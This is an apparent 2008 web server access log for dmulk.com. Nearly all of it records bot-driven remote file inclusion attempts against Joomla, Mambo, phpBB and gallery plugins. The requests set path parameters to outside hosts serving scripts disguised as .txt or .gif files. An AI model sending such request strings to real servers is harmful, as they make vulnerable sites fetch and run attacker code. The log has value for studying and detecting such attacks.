74.53.240.146 - - [24/Aug/2008:09:00:02 -0700] "GET /logs/access_080303.log/language/lang_german/lang_main_album.php?phpbb_root_path=http://www.proostjes.be/calendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [24/Aug/2008:09:00:02 -0700] "GET /language/lang_german/lang_main_album.php?phpbb_root_path=http://www.proostjes.be/calendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [24/Aug/2008:09:00:02 -0700] "GET /logs/language/lang_german/lang_main_album.php?phpbb_root_path=http://www.proostjes.be/calendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:09:00:08 -0700] "GET /logs/access_080810.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.55.109.34 - - [24/Aug/2008:09:00:12 -0700] "GET /logs/access_080406.log//?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.212.108 - - [24/Aug/2008:09:00:14 -0700] "GET /logs/access_080406.log//?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.178.227.111 - - [24/Aug/2008:09:00:14 -0700] "GET /logs/access_080406.log//?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.178.198.129 - - [24/Aug/2008:09:00:14 -0700] "GET /logs/access_080406.log//?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.178.198.129 - - [24/Aug/2008:09:00:14 -0700] "GET /logs/access_080406.log//?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.121.4.30 - - [24/Aug/2008:09:00:14 -0700] "GET /logs/access_080406.log//?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.109.34 - - [24/Aug/2008:09:00:16 -0700] "GET //?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 9939 "-" "libwww-perl/5.805" "www.dmulk.com"
68.178.227.111 - - [24/Aug/2008:09:00:16 -0700] "GET //?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 9939 "-" "libwww-perl/5.79" "www.dmulk.com"
68.178.198.129 - - [24/Aug/2008:09:00:16 -0700] "GET //?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 9939 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.212.108 - - [24/Aug/2008:09:00:16 -0700] "GET //?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 9939 "-" "libwww-perl/5.805" "www.dmulk.com"
68.178.198.129 - - [24/Aug/2008:09:00:16 -0700] "GET //?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 9939 "-" "libwww-perl/5.79" "www.dmulk.com"
91.121.4.30 - - [24/Aug/2008:09:00:16 -0700] "GET //?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 9939 "-" "libwww-perl/5.805" "www.dmulk.com"
68.178.227.111 - - [24/Aug/2008:09:00:16 -0700] "GET /logs//?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 62004 "-" "libwww-perl/5.79" "www.dmulk.com"
74.55.109.34 - - [24/Aug/2008:09:00:16 -0700] "GET /logs//?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 62004 "-" "libwww-perl/5.805" "www.dmulk.com"
68.178.198.129 - - [24/Aug/2008:09:00:16 -0700] "GET /logs//?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 62004 "-" "libwww-perl/5.79" "www.dmulk.com"
91.142.214.149 - - [24/Aug/2008:09:00:16 -0700] "GET /logs//?path%5Bdocroot%5D=http://utilz.info/a4? HTTP/1.1" 200 62004 "-" "libwww-perl/5.805" "www.dmulk.com"
68.178.227.111 - - [24/Aug/2008:09:00:16 -0700] "GET /logs/access_080130.log//?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.178.198.129 - - [24/Aug/2008:09:00:16 -0700] "GET /logs/access_080130.log//?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.55.109.34 - - [24/Aug/2008:09:00:16 -0700] "GET /logs/access_080130.log//?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.178.198.129 - - [24/Aug/2008:09:00:16 -0700] "GET /logs//?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 62004 "-" "libwww-perl/5.79" "www.dmulk.com"
68.178.198.129 - - [24/Aug/2008:09:00:16 -0700] "GET /logs/access_080130.log//?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.121.4.30 - - [24/Aug/2008:09:00:16 -0700] "GET /logs//?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 62004 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.212.108 - - [24/Aug/2008:09:00:16 -0700] "GET /logs//?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 62004 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.240.146 - - [24/Aug/2008:09:00:17 -0700] "GET /logs/access_080302.log/language/lang_german/lang_main_album.php?phpbb_root_path=http://www.proostjes.be/calendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.142.214.149 - - [24/Aug/2008:09:00:17 -0700] "GET //?path%5Bdocroot%5D=http://utilz.info/a4? HTTP/1.1" 200 9863 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.4.30 - - [24/Aug/2008:09:00:17 -0700] "GET /logs/access_080130.log//?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.212.108 - - [24/Aug/2008:09:00:17 -0700] "GET /logs/access_080130.log//?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.205.17 - - [24/Aug/2008:09:00:20 -0700] "GET /logs/access_080810.log//index.php?pg=http://www.insweetlife.com/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.93.128.125 - - [24/Aug/2008:09:00:21 -0700] "GET /logs/access_080406.log//?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
91.93.128.125 - - [24/Aug/2008:09:00:22 -0700] "GET //?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 9939 "-" "libwww-perl/5.813" "www.dmulk.com"
91.93.128.125 - - [24/Aug/2008:09:00:22 -0700] "GET /logs//?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 62004 "-" "libwww-perl/5.813" "www.dmulk.com"
67.18.29.218 - - [24/Aug/2008:09:00:23 -0700] "GET /logs/access_080406.log//?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.93.128.125 - - [24/Aug/2008:09:00:23 -0700] "GET /logs/access_080130.log//?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
67.18.29.218 - - [24/Aug/2008:09:00:25 -0700] "GET //?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 9939 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.29.218 - - [24/Aug/2008:09:00:25 -0700] "GET /logs/access_080406.log//?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.9 - - [24/Aug/2008:09:00:25 -0700] "GET /logs/access_080406.log//?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.29.218 - - [24/Aug/2008:09:00:25 -0700] "GET /logs//?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 62004 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.29.218 - - [24/Aug/2008:09:00:26 -0700] "GET //?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 9939 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.29.218 - - [24/Aug/2008:09:00:26 -0700] "GET /logs/access_080130.log//?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.29.218 - - [24/Aug/2008:09:00:26 -0700] "GET /logs//?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 62004 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.9 - - [24/Aug/2008:09:00:27 -0700] "GET //?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 9939 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.29.218 - - [24/Aug/2008:09:00:27 -0700] "GET /logs/access_080130.log//?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.9 - - [24/Aug/2008:09:00:27 -0700] "GET /logs//?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 62004 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.9 - - [24/Aug/2008:09:00:29 -0700] "GET /logs/access_080130.log//?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.73.137.93 - - [24/Aug/2008:09:00:30 -0700] "GET /logs/access_080710.log/index2.php?p=http://artemcity.ru/r0x.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.222.40.244 - - [24/Aug/2008:09:00:39 -0700] "GET /logs/access_080406.log//?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:09:00:39 -0700] "GET /logs/access_080303.log/language/lang_german/lang_main_album.php?phpbb_root_path=http://spiritualcultivation.com/modules/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:09:00:39 -0700] "GET /language/lang_german/lang_main_album.php?phpbb_root_path=http://spiritualcultivation.com/modules/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:09:00:39 -0700] "GET /logs/language/lang_german/lang_main_album.php?phpbb_root_path=http://spiritualcultivation.com/modules/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
77.222.40.244 - - [24/Aug/2008:09:00:40 -0700] "GET //?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 9939 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.244 - - [24/Aug/2008:09:00:41 -0700] "GET /logs//?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 62004 "-" "libwww-perl/5.805" "www.dmulk.com"
64.185.237.191 - - [24/Aug/2008:09:00:41 -0700] "GET /logs/access_080406.log//?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.191 - - [24/Aug/2008:09:00:41 -0700] "GET /logs/access_080406.log//?option=com_juser&Itemid=&mosConfig_absolute_path=http://www.gseek.net/userimgs/4783e9ccf06969c7fb9c517ec.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.191 - - [24/Aug/2008:09:00:42 -0700] "GET //?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 9939 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.191 - - [24/Aug/2008:09:00:42 -0700] "GET /logs//?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 62004 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.191 - - [24/Aug/2008:09:00:42 -0700] "GET //?option=com_juser&Itemid=&mosConfig_absolute_path=http://www.gseek.net/userimgs/4783e9ccf06969c7fb9c517ec.jpg? HTTP/1.1" 200 9944 "-" "libwww-perl/5.810" "www.dmulk.com"
77.222.40.244 - - [24/Aug/2008:09:00:42 -0700] "GET /logs/access_080130.log//?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.185.237.191 - - [24/Aug/2008:09:00:43 -0700] "GET /logs//?option=com_juser&Itemid=&mosConfig_absolute_path=http://www.gseek.net/userimgs/4783e9ccf06969c7fb9c517ec.jpg? HTTP/1.1" 200 62004 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.191 - - [24/Aug/2008:09:00:43 -0700] "GET /logs/access_080130.log//?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.191 - - [24/Aug/2008:09:00:43 -0700] "GET /logs/access_080130.log//?option=com_juser&Itemid=&mosConfig_absolute_path=http://www.gseek.net/userimgs/4783e9ccf06969c7fb9c517ec.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:09:00:43 -0700] "GET /logs/access_080114.log//myspeach/jscript.php?my_ms[root]=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:09:00:43 -0700] "GET //myspeach/jscript.php?my_ms[root]=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:09:00:44 -0700] "GET /logs//myspeach/jscript.php?my_ms[root]=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:09:00:44 -0700] "GET /logs/access_080323.log//myspeach/jscript.php?my_ms[root]=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:09:00:52 -0700] "GET /logs/access_080302.log/language/lang_german/lang_main_album.php?phpbb_root_path=http://spiritualcultivation.com/modules/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
64.185.237.191 - - [24/Aug/2008:09:00:54 -0700] "GET /logs/access_080406.log//?option=com_juser&Itemid=&mosConfig_absolute_path=http://www.gseek.net/userimgs/4783e9ccf06969c7fb9c517ec.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.191 - - [24/Aug/2008:09:00:55 -0700] "GET //?option=com_juser&Itemid=&mosConfig_absolute_path=http://www.gseek.net/userimgs/4783e9ccf06969c7fb9c517ec.jpg? HTTP/1.1" 200 9944 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.191 - - [24/Aug/2008:09:00:56 -0700] "GET /logs//?option=com_juser&Itemid=&mosConfig_absolute_path=http://www.gseek.net/userimgs/4783e9ccf06969c7fb9c517ec.jpg? HTTP/1.1" 200 62004 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.191 - - [24/Aug/2008:09:00:56 -0700] "GET /logs/access_080130.log//?option=com_juser&Itemid=&mosConfig_absolute_path=http://www.gseek.net/userimgs/4783e9ccf06969c7fb9c517ec.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.68.128 - - [24/Aug/2008:09:01:06 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://gameurs.free.fr/pod/skins/advanced/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.68.128 - - [24/Aug/2008:09:01:06 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://gameurs.free.fr/pod/skins/advanced/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.15.205.17 - - [24/Aug/2008:09:01:09 -0700] "GET /logs/access_080810.log//index.php?pg=http://www.insweetlife.com/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.9.248.162 - - [24/Aug/2008:09:01:21 -0700] "GET /logs/access_080410.log/errors.php?error=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.248.162 - - [24/Aug/2008:09:01:22 -0700] "GET /errors.php?error=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.248.162 - - [24/Aug/2008:09:01:22 -0700] "GET /logs/errors.php?error=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
82.194.76.177 - - [24/Aug/2008:09:01:42 -0700] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://aocbots.com/cms/test.txt?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
82.194.76.177 - - [24/Aug/2008:09:01:42 -0700] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://aocbots.com/cms/test.txt?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
81.9.63.18 - - [24/Aug/2008:09:01:47 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.hladogen.ru/project_files/memei.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.9.63.18 - - [24/Aug/2008:09:01:48 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.hladogen.ru/project_files/memei.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.26.209.159 - - [24/Aug/2008:09:01:55 -0700] "GET /logs//myspeach/jscript.php?my_ms[root]=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.26.209.159 - - [24/Aug/2008:09:01:56 -0700] "GET //myspeach/jscript.php?my_ms[root]=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.113.53.6 - - [24/Aug/2008:09:02:06 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.113.53.6 - - [24/Aug/2008:09:02:06 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.73.137.93 - - [24/Aug/2008:09:02:13 -0700] "GET /logs/access_080714.log/index2.php?p=http://artemcity.ru/r0x.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.202.49.162 - - [24/Aug/2008:09:02:39 -0700] "GET /logs/access_080114.log//myspeach/jscript.php?my_ms[root]=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.202.49.162 - - [24/Aug/2008:09:02:39 -0700] "GET //myspeach/jscript.php?my_ms[root]=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.202.49.162 - - [24/Aug/2008:09:02:40 -0700] "GET /logs//myspeach/jscript.php?my_ms[root]=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.202.49.162 - - [24/Aug/2008:09:02:40 -0700] "GET /logs/access_080323.log//myspeach/jscript.php?my_ms[root]=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.244 - - [24/Aug/2008:09:02:53 -0700] "GET /logs/access_080406.log//?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.244 - - [24/Aug/2008:09:02:55 -0700] "GET //?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 9939 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.244 - - [24/Aug/2008:09:02:56 -0700] "GET /logs//?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 62004 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.29.218 - - [24/Aug/2008:09:02:56 -0700] "GET /logs/access_080406.log//?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.244 - - [24/Aug/2008:09:02:57 -0700] "GET /logs/access_080130.log//?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.29.218 - - [24/Aug/2008:09:02:57 -0700] "GET //?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 9939 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.29.218 - - [24/Aug/2008:09:02:57 -0700] "GET /logs//?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 62004 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.29.218 - - [24/Aug/2008:09:02:58 -0700] "GET /logs/access_080130.log//?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.9.248.162 - - [24/Aug/2008:09:03:10 -0700] "GET /logs/access_080410.log/errors.php?error=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.248.162 - - [24/Aug/2008:09:03:10 -0700] "GET /errors.php?error=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.248.162 - - [24/Aug/2008:09:03:11 -0700] "GET /logs/errors.php?error=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.75.56.186 - - [24/Aug/2008:09:03:19 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://suport08.freehostia.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.75.56.186 - - [24/Aug/2008:09:03:20 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://suport08.freehostia.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.8.100 - - [24/Aug/2008:09:03:20 -0700] "GET /logs/access_080807.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.249.67.135 - - [24/Aug/2008:09:03:46 -0700] "GET /blog/wp-content/gallery/crestoc-2008/thumbs/thumbs_img_0049.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" "dmulk.com"
64.34.171.29 - - [24/Aug/2008:09:03:46 -0700] "GET /logs/access_071219.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.skkulove.com//bbs/c_h_i_t_o_z.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.171.29 - - [24/Aug/2008:09:03:49 -0700] "GET /logs/access_071212.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.skkulove.com//bbs/c_h_i_t_o_z.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.10.37.130 - - [24/Aug/2008:09:04:07 -0700] "GET /logs/access_080811.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cafesjakie.nl/images/sjakie/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.10.37.130 - - [24/Aug/2008:09:04:07 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cafesjakie.nl/images/sjakie/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.10.37.130 - - [24/Aug/2008:09:04:07 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cafesjakie.nl/images/sjakie/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
